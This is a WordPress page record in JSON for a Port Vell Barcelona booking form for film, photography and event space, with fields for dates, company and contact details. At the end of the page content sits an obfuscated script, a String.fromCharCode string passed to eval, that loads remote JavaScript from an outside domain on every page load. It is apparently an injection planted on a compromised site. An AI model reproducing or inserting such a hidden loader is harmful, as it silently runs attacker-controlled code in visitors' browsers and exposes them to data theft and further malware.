{"id":8069,"date":"2020-03-20T09:03:01","date_gmt":"2020-03-20T08:03:01","guid":{"rendered":"https:\/\/portvellbcn.cat\/es\/formulari-2\/"},"modified":"2023-11-03T12:02:01","modified_gmt":"2023-11-03T11:02:01","slug":"formulario-de-reserva-de-espacio","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/formulario-de-reserva-de-espacio\/","title":{"rendered":"Formulario Reserva espacio"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css=\u00bb.vc_custom_1604310285257{margin-top: 0px !important;padding-bottom: 0px !important;}\u00bb][vc_column][vc_column_text el_class=\u00bbtiuloverbig\u00bb]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Solicitud de Filmaciones \/<br \/>\nFotograf\u00eda \/ Base Camp<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; css=\u00bb.vc_custom_1604310339867{margin-top: 50px !important;}\u00bb][vc_column][vc_column_text]Puedes descargar el formulario y enviarlo a <a href=\"mailto:info@portvellbcn.cat\" target=\"_blank\" rel=\"noopener\">info@portvellbcn.cat<\/a> <span style=\"text-decoration: underline;\"><strong><a href=\"https:\/\/portvellbcn.cat\/wp-content\/uploads\/2023\/03\/Sollicitud_Filmacions_CA.pdf\" download=\"\">Descarga el Formulario<\/a><\/strong><\/span>[\/vc_column_text][vc_column_text]Todos los campos deben estar debidamente rellenados, en caso de error en el env\u00edo se mostrar\u00e1 un mensaje de aviso bajo el formulario, y se marcar\u00e1n los campos con errores.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1620027403667{margin-top: 20px !important;}\u00bb][vc_column][vc_column_text]\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f14033-o1\" lang=\"en-US\" dir=\"ltr\" data-wpcf7-id=\"14033\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/es\/wp-json\/wp\/v2\/pages\/8069#wpcf7-f14033-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" enctype=\"multipart\/form-data\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"14033\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f14033-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p class=\"titulo\">SOLICITUD DE RESERVA DE ESPACIO\n<\/p>\n<p>Los espacios del Port Vell est\u00e1n a disposici\u00f3n de las empresas e instituciones que quieran organizar todo tipo de actividades\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"menu-125\"><select class=\"wpcf7-form-control wpcf7-select\" aria-invalid=\"false\" name=\"menu-125\"><option value=\"\">&#8212;Please choose an option&#8212;<\/option><option value=\"&quot;Acc\u00e9s Nova Bocana i Pla\u00e7a Rosa dels Vents&quot;\">&quot;Acc\u00e9s Nova Bocana i Pla\u00e7a Rosa dels Vents&quot;<\/option><option value=\"&quot;General Port Vell&quot;\">&quot;General Port Vell&quot;<\/option><option value=\"&quot;Moll d&#039;Espanya (Voramoll)&quot; &quot;Moll de Barcelona  (Torre Jaume I)&quot;\">&quot;Moll d&#039;Espanya (Voramoll)&quot; &quot;Moll de Barcelona  (Torre Jaume I)&quot;<\/option><option value=\"&quot;Moll de Barcelona (Rambla central)&quot;\">&quot;Moll de Barcelona (Rambla central)&quot;<\/option><option value=\"&quot;Moll de Bosch i Alsina (Mirador del Port Vell)&quot;\">&quot;Moll de Bosch i Alsina (Mirador del Port Vell)&quot;<\/option><option value=\"&quot;Moll de Bosch i Alsina (Rambla de Mar)&quot;\">&quot;Moll de Bosch i Alsina (Rambla de Mar)&quot;<\/option><option value=\"&quot;Moll de Bosch i Alsina (Zona central)&quot;\">&quot;Moll de Bosch i Alsina (Zona central)&quot;<\/option><option value=\"&quot;Moll de Drassanes (Pla\u00e7a del Portal de la Pau)&quot;\">&quot;Moll de Drassanes (Pla\u00e7a del Portal de la Pau)&quot;<\/option><option value=\"&quot;Moll de la Barceloneta&quot; &quot;Moll del Dip\u00f2sit&quot;\">&quot;Moll de la Barceloneta&quot; &quot;Moll del Dip\u00f2sit&quot;<\/option><option value=\"&quot;Moll del Rellotge (Pla de Miquel Tarradell)&quot;\">&quot;Moll del Rellotge (Pla de Miquel Tarradell)&quot;<\/option><option value=\"&quot;Moll d\u2019Espanya (Passeig d\u2019\u00cdtaca)&quot;\">&quot;Moll d\u2019Espanya (Passeig d\u2019\u00cdtaca)&quot;<\/option><option value=\"&quot;Passeig Mare Nostrum&quot; &quot;Pla\u00e7a del Mar (Platja de Sant Sebasti\u00e0)&quot;\">&quot;Passeig Mare Nostrum&quot; &quot;Pla\u00e7a del Mar (Platja de Sant Sebasti\u00e0)&quot;<\/option><option value=\"&quot;Pla\u00e7a Pau Vila&quot;\">&quot;Pla\u00e7a Pau Vila&quot;<\/option><option value=\"&quot;Rambla de Mar&quot;\">&quot;Rambla de Mar&quot;<\/option><\/select><\/span>\n<\/p>\n<p><a href=\"\/ca\/lloguer_espais\/reserva_espais\/conditions\">Condiciones<\/a>\n<\/p>\n<p>Fecha inicio actividad*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"date-inici\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date-inici\" \/><\/span>\n<\/p>\n<p>Fecha final actividad*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"date-final\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date-final\" \/><\/span>\n<\/p>\n<p>Descripci\u00f3n de la actividad*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"textarea-descripcio\"><textarea cols=\"40\" rows=\"10\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"textarea-descripcio\"><\/textarea><\/span>\n<\/p>\n<p>Nombre de la empresa*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-nom\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-nom\" \/><\/span>\n<\/p>\n<p>Cliente que representa\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-client\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-client\" \/><\/span>\n<\/p>\n<p>Mail de contacto*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"text-email\" \/><\/span>\n<\/p>\n<p>Tel\u00e9fono de contacto\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tel-contacte\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-text wpcf7-validates-as-tel\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"tel-contacte\" \/><\/span>\n<\/p>\n<p>Nom de la persona responsable\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-nompersona\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-nompersona\" \/><\/span>\n<\/p>\n<p>Adjuntar archivo (PDF o Word) para informaci\u00f3n adicional\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"file-pdf\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-file\" accept=\"audio\/*,video\/*,image\/*\" aria-invalid=\"false\" type=\"file\" name=\"file-pdf\" \/><\/span>\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Enviar\" \/>\n<\/p>\n\n\n\n<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css=\u00bb.vc_custom_1604310285257{margin-top: 0px !important;padding-bottom: 0px !important;}\u00bb][vc_column][vc_column_text el_class=\u00bbtiuloverbig\u00bb] Solicitud de Filmaciones \/ Fotograf\u00eda \/ Base Camp [\/vc_column_text][\/vc_column][\/vc_row][vc_row top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; css=\u00bb.vc_custom_1604310339867{margin-top: 50px !important;}\u00bb][vc_column][vc_column_text]Puedes descargar el formulario y enviarlo a info@portvellbcn.cat Descarga el Formulario[\/vc_column_text][vc_column_text]Todos los campos deben estar debidamente rellenados, en caso de error en el env\u00edo se mostrar\u00e1 un mensaje de aviso bajo el formulario, y se marcar\u00e1n los campos con errores.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1620027403667{margin-top: 20px !important;}\u00bb][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-8069","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/8069","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=8069"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/8069\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=8069"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}